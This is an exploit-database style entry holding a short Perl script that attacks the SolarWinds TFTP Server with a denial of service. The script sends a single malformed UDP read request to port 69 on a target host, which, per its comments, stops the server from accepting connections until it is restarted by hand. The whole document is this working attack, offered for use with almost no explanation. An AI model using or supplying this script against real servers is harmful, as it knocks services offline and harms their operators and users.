# Exploit Title: Solarwinds TFTP DOS # Date: 5-21-2010 # Author: Nullthreat # Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx # Version: # Tested on: Windows XP SP3 # Code : #!/usr/bin/perl # SolarWinds TFTP Server Remote DoS Exploit # by Nullthreat # The application will not crash, but it will stop accepting connections. # You will be forced to restart the server by hand in the config # Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k use IO::Socket; $port = "69"; $host = $ARGV[0]; $s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp'); $really= "\x00\x01". # Opcode 1 = Read Request "\x01". # The crash....no really thats it "\x00". # Null byte "NETASCII". # The mode "\x00"; # Null byte $s->send($really);